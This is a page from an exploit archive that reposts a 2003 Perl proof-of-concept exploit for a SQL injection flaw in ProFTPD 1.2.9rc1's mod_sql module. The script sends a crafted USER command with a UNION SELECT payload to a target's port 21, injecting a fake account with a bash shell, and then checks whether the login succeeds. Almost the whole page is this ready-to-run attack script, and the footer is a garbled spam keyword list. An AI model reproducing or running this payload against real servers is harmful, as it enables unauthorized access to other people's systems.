about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , ProFTPD 1.2.9rc1 mod_sql SQL Injection remote Exploit




2003-06-19 ProFTPD 1.2.9rc1 mod_sql SQL Injection remote Exploit
#!/usr/bin/perl
# ProFTPD 1.2.9 rc1 mod_sql SQL Injection remote Exploit
# Spaine - 2003

use IO::Socket;
if(@ARGC<2){
 print "\nProof Of Concept Sql Inject on ProFTPD\n";
 print "Usage: perl poc-sqlftp <target> [1=Alternate
query]\n\n";
 exit(0);
};

$server = $ARGV[0];
$query = $ARGV[1];
$remote = 
IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$server,PeerPort=>"21",Reuse=>1)

 or die "Can't connect. \n";
if(defined($line=<$remote>)){
 print STDOUT $line;
}

# Proof of concept query, it may change on the number of rows
# By default, it can query User, Pass, Uid, Gid, Shell or
# User, Pass, Uid, Gid, Shell, Path, change the union query...

if($query eq "1"){
 print $remote "USER ')UNION 
SELECT'u','p',1002,1002,'/tmp','/bin/bash'WHERE(''='\n";
}else{
 print $remote "USER ')UNION SELECT'u','p',1002,1002,'/bin/bash' 
WHERE(''='\n";
};
if(defined($line=<$remote>)){
 print STDOUT $line;
}
print $remote "PASS p\n";
if(defined($line=<$remote>)){
 print STDOUT $line;
}
print "Sent query to $ARGV[0]\n";
if($line =~ /230/){ #logged in
 print "[------- Sql Inject Able \n";
}else{
 print "[------- Sql Inject Unable \n";
}
close $remote;


securitydot.net - 2003-06-19

Advertising

Copyright 2007, SecurityDot
Sat, 22 Nov 2008 14:45:17 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
susmita za xxx89.com ate Cutenews netscape mambo Remo WWW.WOLD.S www seyx.v Active MQ VIDEO SEX Www.Sex 30 telephony Vidio sex sexflm www.bebo.c Asharia 200 /compo Www pondok 200 /compo fjfjf Www.Midnig Oracle HTT arab porno news for C PC plugin sex+animal /modules/4 CMS is Fre Www.sexyin mambo Remo news for c tjma videosexgr freepornvi 200 /compo mambo Remo sex nekol sex nekol nehadhupiy videosexgr Video porn CMS is Fre search/exp Free sex v www.bollyw Vulnerabil Archana Www.pretty Vanessa An www.google